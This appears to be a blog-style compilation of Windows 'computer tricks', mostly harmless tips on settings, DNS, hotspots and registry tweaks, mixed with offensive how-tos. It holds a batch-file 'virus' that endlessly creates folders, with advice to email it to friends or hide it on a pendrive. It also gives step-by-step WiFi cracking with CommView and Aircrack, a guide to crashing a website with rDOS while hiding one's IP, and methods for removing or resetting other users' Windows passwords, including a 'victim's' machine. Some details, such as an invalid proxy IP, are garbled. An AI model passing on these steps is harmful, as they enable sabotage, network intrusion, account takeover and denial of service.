Some Best Computer Tricks

1. To Deleate a undeletable file
1] Open Notepad.exe
2] Click File>Save As..>
3] locate the folder where ur undeletable file is
4] Choose ‘All files’ from the file type box
5] click once on the file u wanna delete so its name appears in the ‘filename’ box
6] put a ” at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
7] Cick save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal

2. Create a Virus to unlimitedly opening a folder in pc
@echo off
:top
md %random%
goto top
Type above code in notepad and save it with name something.bat. send it to friend via E-mail or Hide it and upload it in pendrive.
NOTE:- Don’t Open in your pc.
Hecking a Wifi
Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .Note :- You will not be able to connect to any Network using WiFi when using CommView .
Step 2 : Click on the PLAY ICON in the Left First
Step 3 : (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button
Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .
Step 6 : (Saving the Packets ) : Now that the Packets are getting captured you need to Save them. Click on Settings->Options->Memory Usage Change Maximum Packets in buffer to 20000.
Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 5000
Average Log File Size : 50
Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .
Step 7 : ( Concatenating the Logs ) : Since you are capturing a lot of logs you will need to concatenate them into once file . To do this go to Logging and click on CONCATENATE LOGS Choose all the files that have been saved in your specified folder and Concatenate them .Now you will have one .ncf file .
Step 8 : (Converting .ncf to .cap ) : Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format .

Aircrack Part :Now for the Second Part Cracking this is very simple . Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others .

3. Crashed Small Website
First Download 3 Softwares :-
1. Download Port Scanner
2. Download rDOS
3. Download Ip Hiding tool
 Follow these steps:
1: First of all you need to know the IP address of the website you
want to crash. Use ping command in windows to get the ip address of
the website.
open CMD and enter ping www.website.com see the snap Now
you have the IP address of the website.
2: Now use Port scanner to
check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack [image: :P] otherwise you can’t crash this website.
3: Now open your rDos. Enter
your victims ip that you got from step
1.It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work

4. Free Twitter Followers
www.ClaimFans.com   (Claim 50 Daily Bonus)
www.UpLike.net
www.Swapes.com         (Claim 50 Daily Bonus)
www.LikeViews.com
www.SocialJumbo.com
www.O-Cb.com
www.LikeVisits.com
www.EnhanceWebviews.com
www.Likerr.eu
NOTE:-get 50 free credits for joining.those credits you can use to get free twitter followers and also for facebook pages likes.
5. Use An on Screen Key Board without Software
[bookmark: more]Do you want to use an onscreen keyboard on your pc.
Its simple:
Go to start
>Run
Type osk
>enter.
Enjoy KEYBOARD ON YOUR SCREEN

6. Making your Nokia Phone a Wifi hotspot S60
So do you want to use your Nokia phone as Wi-Fi Hotspot so that you can access internet on different laptops and other portable devices through your mobile phone than tune into this post because we are goinn to show you how you can make your Nokia Phone into a Wi-Fi Hotspot. JoikuSpot is an awesome application for mobile phone which makes your Nokia Phone into a Wi-Fi Hotspot
HERE is Software link
1] http://www.joiku.com/products/joikuspot_light



7. Reliance 3G Free GPRS Trick ForMobile And PC
on February 9, 2013 at 12:00 pm
Follow Below Instructions:-
Proxy:- 97.253.291.99
Port:-8080
APN:- smartwap OR smartnet
Homepage:-
http://iknowtrick.in or Google.com
MCC -400
MNC -22
100% working in India
Enjoy!

8. Speed Up of your internet Connection
Speed up Network Browsing by Removing Network Scheduled Tasks
Open REGEDIT
-HKEY_LOCAL_MACHINESOFTWARE-Microsoft-Windows-CurrentVersion-Explorer-RemoteComputer-NameSpace-{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
9. How to Extract Text from any Image ?
on February 7, 2013 at 2:58 pm
Free OCR is an online website which does this work for you in minutes and free of cost. The process is pretty simply and can be done easily by simply visiting the website then uploading the text image and then click Send to process the image and extract the text out of that image.
LINK :- http://www.free-ocr.com/
10. Login To Your PC Using Face Recognition System like Android
on February 7, 2013 at 2:51 pm
Luxand Blink! Pro. is the name of the software (16 MB)
LINK 1]  http://www.filesonic.in/file/676638881/Product_version_2.3.zip
LINK 2] http://depositfiles.com/files/ags3o6tag
LINK 3] http://www.luxand.com/download/LuxandBlinkSetup.exe

11. Free .in Domain
on February 7, 2013 at 2:42 pm
HostGator,Federation of Indian Micro and Small & Medium Enterprises,ICICI Bank
And Google have launched a program to give .IN free domain,1 year free hosting
and let india get online on business
 FOR MORE INFORMATION AND TO GET FREE WEBSITE:- http://www.indiagetonline.in/
12. Increase Your FacebookPage Like
on February 6, 2013 at 11:51 am
Friend Want
To Increase Your Facebook page like…here i a trick. just follow this simple step.
1.Join This Group. http://www.adf.ly/IumqQ
2 Get Your Page Tagging Code.
3.Post your page tagging code in to group then people comment you to tag there page in your page just start tagging other page and get tagged your page. This will help you to increase your
page like…that’s it..
13. How to “Delete administrator Password” without any software in windows 8
Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D’nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer
14. How to Download Torrent Files with IDM
In this trick you can download any torrent file with the help of idm. For perform this trick, idm software must be installed in your computer. Now perform this trick. First of all, idm software install in your computer. Now copy any torrent file link address and go to this link  www.zbigz.com . Now paste that torrent file link address in the upload torrent file box.
After it, click on Go button.
Now your work has been done.


15. Password Protect Any Folder Without Any Software
In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). 
1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
To change the password replace coolhacks with  new password in the above code
How To Further Secure ?
You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.
16. Learn To Hide Files Behind The Images
[image: hide files behind images]
There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?
In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.
cd desktop
[image: hide files behind images ]

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
[image: hide files behind images]
Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
Replace filename with name of your file you want to hide. It must be in .rar format.
Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.
How To Access Hidden File ?
To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

17. Rebooting  PC in selective statup for XP
Step 1: Start the System Configuration Utility
1. Click Start, click Run, type msconfig, and then click OK.
2. The System Configuration Utility dialog box is displayed.
Step 2: Configure selective startup options
1. In the System Configuration Utility dialog box, click the General tab, and then click Selective Startup.
2. Click to clear the Process SYSTEM.INI File check box.
3. Click to clear the Process WIN.INI File check box.
4. Click to clear the Load Startup Items check box. Verify that Load System Services and Use Original BOOT.INI are checked.
5. Click the Services tab.
6. Click to select the Hide All Microsoft Services check box.
7. Click Disable All, and then click OK.
8. When you are prompted, click Restart to restart the computer.
Step 3: Log on to Windows
1. If you are prompted, log on to Windows.
2. When you receive the following message, click to select the Don't show this message or launch the System Configuration Utility when Windows start check box, and then click OK. 

Notes
· You have used the System Configuration Utility to make changes to the way Windows starts.
· The System Configuration Utility is currently in Diagnostic or Selective Startup mode, causing this message to be displayed and the utility to run every time Windows starts.
· Choose the Normal Startup mode on the General tab to start Windows normally and undo the changes you made using the System Configuration Utility.
Step 4: Optional step to disable features
If the clean boot fixed the error, you do not have to perform this step. 

Important If your problem is not fixed and you do have to follow this step, it permanently removes all restore points from your computer. The System Restore feature uses restore points to restore your computer to an earlier state. If you remove the restore points, you can no longer restore Windows to an earlier state.

This step temporarily disables Microsoft features such as Plug and Play, networking, event logging, and error reporting.
1. Click Start, click Run, type msconfig, and then click OK.
The System Configuration Utility dialog box is displayed.
2. Click the General tab, click to clear the Load System Services check box, and then click OK.
3. When you are prompted, click Restart to restart the computer.
If these steps helped you start your computer in a clean-boot state, you are finished. If these steps did not help, go to the “Next Steps” section. If you have to return your computer to a normal startup state, go to “Steps to configure Windows to use a Normal startup state”.
18. Steps to configure Windows to use a Normal startup state
After you used the clean boot to resolve your problem, you can follow these steps to configure Windows XP to start normally.
1. Click Start, and then click Run.
2. Type msconfig, and then click OK.
The System Configuration Utility dialog box is displayed.
3. Click the General tab, click Normal Startup - load all device drivers and services, and then click OK.
4. When you are prompted, click Restart to restart the computer.

19. How to Increase Internet Speed on Windows
In the 21st century, it can be witnessed that each and every individual is always in hurry. In every individual’s life, there are a number of tasks that need to be fulfilled and that is exactly why swift pace is what we prefer. We tend to hold a similar need in case of the Internet speed as well. Many a times, we face the problem of slow Internet speed that ends up heavily disrupting our activities and schedule at large. Hence, in order to prevent the occurrence of this particular situation in our lives, it is essential for us to pay heed to the tips mentioned below, which are believed to assist us in lifting up the Internet speed of Windows altogether.
#1 Reservable Bandwidth
First and foremost, you can begin with enabling the reservable bandwidth and following this by setting it on zero. If this is done, then your system will be in a position to reserve nothing, but the twenty percent default. In order to activate the same you need to follow a certain prescribed process.
Click on “Start” button then click on Run option (You can use shortcut “Windows button + R”) and type gpedit.msc. It’ll open new window of the “Local Group Policy Editor”. Then go to
–> Local Computer Policy
–> Computer Configuration
–> Administrative Templates
–> Network
–> QoS Packet Scheduler
–> Limit Reservable Bandwidth. Click on Limit Reservable bandwidth. Then it’ll open new window of “Limit reservable bandwidth”.
You will see “not configured” radio button is selected by default, by default, “the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection” so click on “enabled” radio button and in Options set Bandwidth limit (%) to 0. So from now system will reserve nothing, rather than the default 20%.
20. Using OpenDNS or Google Public DNS
To increase Internet speed use any DNS service either OpenDNS or Google Public DNS.
OpenDNS
Apart from the aforementioned approach, you can also consider making use of OpenDNS in order to lift up the Internet Speed on Windows. The OpenDNS is known to offer complete protection as far as phishing attacks and botnet infections are concerned. Moreover, the OpenDNS is known to ensure that the websites are easily accessible. However, the cherry on the cake still remains the fact that the OpenDNS is an experimental service and thus the chances of additional features being continually added to the same always remains bright.
Click on Start Button then open Control Panel then go to
–> View Network status or Network and Sharing Center
–> Choose Your Network Connection
–> Properties
–> Check for Internet Protocol Version 4 (TCP/IPv4)
–> Click on Properties again
–> Enter Open DNS preferred IP addresses (208.67.222.222 for the Preferred DNS Server box and 208.67.222.220 for the Alternate one.)
–> Exit and go to your desktop.
Open Run Windows (“Windows button + R” or open Run Window from Start Menu) Type ipconfig/flushdns in the black box that appears on the screen. The process of installing OpenDNS on your computer is now complete.
Google Public DNS
You can also make use of the Google Public DNS is order to make certain that the websites are loaded faster. This is possible because the Google Public DNS is known to approach the server that is closest to you whenever you go ahead with a web page request.
[image: Google Public DNS Setup Windows 7]
Google Public DNS Setup – Windows 7
If you want to use Google Public DNS instead of OpenDNS then follow same steps give above just use 8.8.8.8 for Preferred DNS server field and 8.8.4.4 for the Alternate one. Again don’t forget to flush the DNS as shown in above method.
Windows 7: The Top  Hidden Features
21. God Mode
It may be hyperbolically named, but Windows 7's God Mode is indeed omnipresent. It conveniently puts hundreds of settings from all around the operating system all in one place.

To turn on God Mode, create a new folder on your desktop--or anywhere you'd like--and name it: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  . The name Godmode can be change as you like.Don't include the final period. The resulting folder will contain 270 items, representing virtually every configurable option in Windows 7.
22. Enhanced Calculator
Windows' built-in calculator hasn't really changed much over the years, but Windows 7's calculator has a few extra tricks up its sleeve, which you'll find under the View menu. It can do myriad kinds of unit conversion (temperature, weight, area, and eight others), interesting date calculations, and even has worksheets to calculate a mortgage payment or a car's fuel mileage. It maintains a history of your previous calculations as long as the program is open.
23. WordPad's File Support
The built-in WordPad word processor in Vista is of limited usefulness because it only supports RTF (Rich Text Format) and plain text (TXT) files. In Windows 7, on the other hand, WordPad isn't quite as restricted. 

Although Windows 7's WordPad still doesn't work with .doc files from Microsoft Word 2003 and earlier versions, it can open and save ODT (OpenDocument Text) files used by the free OpenOffice.org word processor as well as .docx files created in Microsoft Word 2007 or 2010. Although WordPad can't understand all the complex formatting (it will warn you of this upon opening or saving a file), it will still let you read the documents without having the native programs installed.
24. Reliability Monitor
When your system's acting flaky and you're trying to figure out what's going on, the Reliability Monitor may help. Search for "reliability" from the Start menu, and run View reliability history. You'll get a graph of your system's "stability index" over a period of days and weeks (rated on a scale of 1 to 10). It displays which programs, Windows components, or miscellaneous items crashed on a given day, helping you identify problem items.
25. Problem Steps Recorder
When you need outside PC help, it's much better to let them see for themselves what's happening on your system. But if remote access isn't an option, the Problem Steps Recorder may be the next best thing. 

Search for and run "psr" from the Start menu. Click Start Record, and the utility will record your activities through a series of screen shots, automatically including captions that show exactly where you clicked. You can also use the Add Comment button to highlight specific areas of the screen and insert custom annotations. When you stop recording, everything will be stitched together and saved as a Web browser-compatible MHTML (MIME HTML) file, conveniently pre-ZIPped and ready for e-mailing to your geek of choice.
26. Power Efficiency Report
If your Windows 7 laptop isn't getting the battery life you expect—or it experiences power-related issues, such as the inability to go into standby or hibernate mode—the problem usually lies with incorrectly configured power management settings. 

Windows 7's Power Efficiency Report can help you sniff out potential problems. Type search for CMD from the Start menu, run it as an administrator (right-click cmd.exe on the menu and choose Run as administrator). From the command prompt, type powercfg –energy(include the space) to scan your system, and after about a minute, you'll find a file called energy-report.html in your \windows\system32 folder. Copy the report to another location and open it (you'll get a file not found error if you try to open it from the system32 folder) for detailed information about what system devices or settings are throwing a monkey wrench into your power management. Get more details on the PowerCfg utility.
27. Pin Folders to the Taskbar
You already know that you can right-click your favorite programs and pin them to the Windows 7 Taskbar for easy access. Right? Although there's no such option for folders, there is another way to keep them close at hand on the Taskbar. Right-click any folder, drag it to an empty space on the Taskbar (or to the Windows Explorer button), and let go when "Pin to Windows Explorer" appears. Now when you right-click the Windows Explorer button, your folders will be accessible via the Jump List.
28. Wipe Free Disk Space08
It's no secret (or at least, it shouldn't be) that when you delete files or folders in Windows, they're not actually erased—the space they took up is simply marked as "available for use," which allows the files to be recoverable (with the right software) until they're overwritten with new data. 

There is a utility built-into Windows (even XP Pro and Vista) that will overwrite all the free space on a hard drive, insuring any files you've deleted stay dead. Launch a command prompt and type cipher /w:X where X is the letter of the drive or partition you want to wipe. Be patient—the process can take a long time if you have a lot of free space.
29. Hotkey a Window between Monitors
Want an easy and mouse-free way to move windows around a display or, better yet, between multiple monitors? When you press the Windows key + the left or right arrow key, the active window will move from its original position and anchor itself to the edge of the screen in the direction of the arrow, and it will do so across every monitor you have. Similarly, if you press Windows + SHIFT + left or right arrow, the active window will jump over to the same position on the adjacent monitor (so if you only have two monitors, it doesn't matter which arrow key you use).	
30. Burn images
Windows 7 finally introduces a feature that other operating systems have had for years - the ability to burn ISO images to CDs or DVDs. And it couldn't be much easier to use. Just double-click the ISO image, choose the drive with the blank disc, click Burn and watch as your disc is created.
31. Create and mount VHD files
Microsoft's Virtual PC creates its virtual machine hard drives in VHD files, and Windows 7 can now mount these directly so you can access them in the host system. Click Start, type diskmgmt.msc and press Enter, then click Action > Attach VHD and choose the file you'd like to mount. It will then appear as a virtual drive in Explorer and can be accessed, copied or written just like any other drive.
Click Action > Create VHD and you can now create a new virtual drive of your own (right-click it, select Initialise Disk, and after it's set up right-click the unallocated space and select New Simple Volume to set this up). Again, you'll be left with a virtual drive that behaves just like any other, where you can drag and drop files, install programs, test partitioning software or do whatever you like. But it's actually just this VHD file on your real hard drive which you can easily back up or share with others. Right-click the disk (that's the left-hand label that says "Disk 2" or whatever) and select Detach VHD to remove it.
The command line DISKPART utility has also been upgraded with tools to detach a VHD file, and an EXPAND command to increase a virtual disk's maximum size. Don't play around with this unless you know what you're doing, though - it's all too easy to trash your system.
32. Troubleshoot problems
If some part of Windows 7 is behaving strangely, and you don't know why, then click Control Panel > Find and fix problems (or 'Troubleshooting') to access the new troubleshooting packs. These are simple wizards that will resolve common problems, check your settings, clean up your system and more.
33. Take control
Tired of the kids installing dubious software or running applications you'd rather they left alone? AppLocker is a new Windows 7 feature that ensures users can only run the programs you specify. Don't worry, that's easier to set up than it sounds: you can create a rule to allow everything signed by a particular publisher, so choose Microsoft, say, and that one rule will let you run all signed Microsoft applications. Launch GPEDIT.MSC and go to Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker to get a feel for how this works.
34. Switch to a projector
Windows 7 now provides a standard way to switch your display from one monitor to another, or a projector - just press Win+P or run DisplaySwitch.exe and choose your preferred display. (This will have no effect if you've only one display connected.)
35. Understanding System Restore
Using System Restore in previous versions of Windows has been something of a gamble. There's no way of telling which applications or drivers it might affect - you just have to try it and see.
Windows 7 is different. Right-click Computer, select Properties > System Protection > System Restore > Next, and choose the restore point you'd like to use. Click the new button to 'Scan for affected programs' and Windows will tell you which (if any) programs and drivers will be deleted or recovered by selecting this restore point. (Read our full Windows 7 System Restore tutorial.)

36.  How to turn your Windows 7 laptop into a wireless hotspot
If you're in luck and manage to find and install an up-to-date Windows 7 driver for your wi-fi adapter, then the next step is to set it up, and for that you'll need an elevated command promptwith  "Run as Administrator".
Now type the following command:
netsh wlan set hostednetwork mode=allow ssid=MyNet key=MyPassword
and press [Enter]. Replace "MyNet" with the name you'd like to use for your custom network, and "MyPassword" with a password that's a little harder to guess.
Still at Mythe command line, typenetsh
netsh wlan start hostednetwork
and press [Enter] to fire up the virtual adapter.
Now click Control Panel > Network and Internet > Network and Sharing Centre > Change Adapter Settings, right-click your internet connection and select Properties. Click the Sharing tab, check "Allow other network users to connect...", choose your virtual Wi-Fi adaptor - and that's it.
Any nearby Wi-Fi enabled device should see a new network appear with the SSID you defined above. They'll be able to connect to it using your password, and can then immediately share your internet connection.
Or Create a bat file with following command
@echo off
netsh wlan set hostednetwork mode=allow ssid=MyNet key=password
netsh wlan start hostednetwork
this bat works fine but run as administrator.
37. Customise the log-on screen
Changing the Windows log-on screen used to involve some complicated and potentially dangerous hacks, but not any more - Windows 7 makes it easy.
First, browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background in REGEDIT, double-click the DWORD key called OEMBackground (not there? Create it) and set its value to 1.
Now find a background image you'd like to use. Make sure it's less than 256KB in size, and matches the aspect ratio of your screen as it'll be stretched to fit.
Next, copy that image into the %windir%\system32\oobe\info\backgrounds folder (create the info\backgrounds folders if they don't exist). Rename the image to backgroundDefault.jpg, reboot, and you should now have a custom log-on image.
Alternatively, use a free tweaking tool to handle everything for you. Logon Changer displays a preview so you can see how the log-on screen will look without rebooting, while the Logon Screen Rotator accepts multiple images and will display a different one every time you log on.
38. Remove taskbar buttons
One problem with the previous tip is the buttons will gobble up valuable taskbar real estate, but you can reduce the impact of this by removing their text captions. Launch REGEDIT, browse to HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics, add a string called MinWidth, set it to 54, and reboot to see the results.
39. Pin a drive to the taskbar
The taskbar isn't just for apps and documents. With just a few seconds work you can pin drive icons there, too.
Right-click an empty part of the desktop, select New > Text File, and rename the file to drive.exe. Drag and drop this onto your taskbar, then delete the original file.
Right-click your new "drive.exe" taskbar button, then right-click its file name and select Properties. Change the contents of both the Target and Start In boxes to point at the drive or folder of your choice, perhaps click Change Icon to choose an appropriate drive icon, and you're done - that drive or folder is now available at a click.
40. Expand your taskbar previews
Move your mouse cursor over a Windows 7 taskbar button and you'll see a small preview of the application window. To make this larger, launch REGEDIT, browse to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband, right-click in the right hand pane and create a new DWORD value called MinThumbSizePx. Double-click this, choose the Decimal option, set the value to 350 and reboot to see the results. Tweak the value again to fine-tune the results, or delete it to return to the default thumbnail size.
41. Search privacy
By default Windows 7 will remember your PC search queries, and display the most recent examples when searching in Windows Explorer. If you're sharing a PC and don't want everyone to see your searches, then launch REGEDIT and browse to HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer. Right-click in the right-hand pane, create a new DWORD value called DisableSearchBoxSuggestions, set it to 1, and this will take effect after you next reboot.
42. Protect your data
If you have confidential files in a particular folder or two, and would like to keep them away from other network users, then right-click the folder, select Share With > Nobody, and they'll be made private, for your eyes only (or your user account, anyway).
43. Disable hibernation
By default Windows 7 will permanently consume a chunk of your hard drive with its hibernation file, but if you never use sleep, and always turn your PC off, then this will never actually be used. To disable hibernation and recover a little hard drive space, launch REGEDIT, browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power, then set both HibernateEnabled and HiberFileSizePerfect to zero.
44. Create a new folder shortcut
When you need to create a new folder in Windows 7 Explorer, don't reach for the mouse. Just press Ctrl+Shift+N to create the folder in the active Explorer window, then type its name as usual.

45. Make your Computer Talk

To create one such talk script, follow the steps given below:-

[image: Make your Computer Talk]

Steps
1. Open Notepad.
2. Copy and paste the exact code given below.
          Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message
    3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
    4.  Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK. 
46. Make your Computer Welcome You

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-
1. Click on Start. Navigate to All Programs, Accessories and Notepad.
2. Copy and paste the exact code given below.
3. 
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
    
 3.  Replace Username with your own name. 
     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5.  Copy the saved file. 
     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
     7.  Paste the file.

[image: Make your Computer Welcome you at startup]
Now when the next time you start your computer, Windows will welcome you in its own computerized voice. 

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
1. Go to Control Panel.
2. Then click on Switch to Classic View.
3. Then Click on Sounds and Audio Devices.
4. Then Click on the Sounds Tab.
5. Select No Sounds from the Sound Scheme option.
6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
7. Click on OK.
[image: Change Sound Scheme to No Sounds]


47. How to creak Windows Password
Open the window in safe Mood with command prompt option by pressing F8 in the boot.
In the command prompt enter the following command and enter to see the users of the computer.
Net user <press enter>
It will display all the users of the computer. Next enter the following command to see the status of the specific user you want 
Net user username <press enter>
This will display details of the user. Now to change the password of the user enter the following command
Net user username * <press enter> now it will ask to enter the new password and again confirm it. To left it without password, simply press enter key and again to confirm.




48. Chat with your Friends with Command Prompt 
Hello my reader now you can chat with your friends easily with this simple trick . so then you just need you friend IP and your command prompt
1.     Open the office word or notepad  and paste this code

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
      2.     Now save this file with the “messenger.bat” then open your command prompt.
      3.     Drag the file (.bat file) over to the CP and then press enter.
      4.     So then CP show you the messenger and user
      5.     So in the user field you just enter your friend IP
      6.     So after that just enter you message want to send your friend
So this is a simple trick to chat with the command prompt so start chatting with him or her .

49. hecking a user account
1. First Log in into your Computer ( or another computer you have been authorized) Below are the 
2. Windows XP and Windows 7 Log-ins
3. [image: http://premiermicrosoft.files.wordpress.com/2012/07/image_thumb135.png?w=244&h=89] [image: http://premiermicrosoft.files.wordpress.com/2012/07/image_thumb136.png?w=131&h=141]
4. Now hit the WINDOWS Key + “R” to open the Windows Run utility
[image: Windows Run]
5. In the box, type “cmd.exe”, as shown

6. You should get Command Prompt, it looks like this: [image: Command Prompt]
7. From here you can: Change Passwords, Delete Accounts, Remove Passwords.Once you have deleted an account’s password, you can hack into the user’s files…

Change Password
1. First you need to know the username you are trying to hack. In my case, it is JuanFB
2. Next, please type these words exactly:  net user USERNAME * ( Type your OWN Username) Hit ENTER[image: image]
3. In this example, the username is JuanFB so that what I typed…
4. Notice that, you can now change the password.
5. Type in the new password: ( the words are hidden) and Confirm again[image: image]
6. You have now changed the password of the username and can now hack into the username’s files ( To have no password, Hit ENTER on both “Type” and “Retype” options)

Add a User Account
1. To add a username, you can follow these steps.
2. Next, please type these words exactly: net user USERNAME /add ( Type your OWN Username) Hit ENTER
3. This will now create a new User Account

50. Automatically Defragment C: Daily
schtasks /create /tn "Defrag C" /tr "defrag c: /f" /sc daily /st 23:00:00 /ru "System" 
This will set your computer to automatically perform a complete defrag of the C: drive each day at 11:00:00 PM (23:00:00). It does this by creating a scheduled task calledDefrag C. It will run this command under the computer’s system account.
51. How to delete Autorun virus from command prompt
1)Click the “Start” button and go to “Run“. Otherwise you can also press “Windows+R“ and type “cmd” there.
[image: http://images.techtipsgeek.com/post/Remove-Viruses-from-Computer-run-command-prompt.gif]
After Opening The CMD Type the following commands.

· Type “<Drive_name>:” in CMD(command prompt) and hit “Enter“. (“Drive_name” is where the problem occurs, it may be any USB drive. For Example Type f: )
· Type “attrib” and hit “Enter“. (This will show the files that are present in the currently working directory. OR you can also use the command “dir/w/o/a/p“)
· If there are any autorun.inf then go for next steps else the drive is not affected with any autorun.inf file.
· Type “attrib -h -r -s -a *.* ” then hit “Enter“  (This command will remove the Hidden, Read Only, System and Archive attributes over any file)
· After completing the previous step you can see the files.  So you can delete the file now.
· Type “del autorun.inf” in the Command Prompt and hit “Enter“.
· Type “del a.dll.vbs” in the Command Prompt  <a.dll.vbs or  any other virus file as you like>and hit “Enter.
52. How can I play a sound file from a Windows batch file?
Use the start command to start the program associated with the file. For example, if you wanted to open the player to play "music.mp3" in the command line or batch file you could type the below command.
start music.mp3
If the sound file has a space in the filename, surround the filename in quotes as shown in the below example.
start c:\music\"my song.mp3"
Tip: Using the start command opens the file in the default audio player. This means by default audio files will open in Windows Media Player. However, if the user has installed a different audio program that has re-associated the audio files it will open in that program. If you want Windows Media Player to play the audio file regardless of what other audio players have been installed, try the below alternative solution.
Alternative solution
Using the Windows mplay32.exe, mplayer.exe, or wmplayer.exe file included with Microsoft Windows allows you to play Windows sound files. Depending on your version of Windows will depend on what file you'll run. Windows 95 and 98 users use mplayer, Windows XP and 2000 users use mplay32 as shown in the below examples, and Windows Vista and Windows 7 users use wmplayer.
As can be seen in the example below, we're using mplay32 as the program to play the file. The /play and /close switches are used to tell the program to play the file once open and then close when done. Finally, the remainder of the line is the full path to where the audio file is stored. In this example, we're playing the Windows chimes file.
mplay32 /play /close c:\windows\media\chimes.wav
If the file or directory has a space in it, make sure to include the full path in quotes as shown below.
mplay32 /play /close "c:\windows\media\windows xp error.wav"
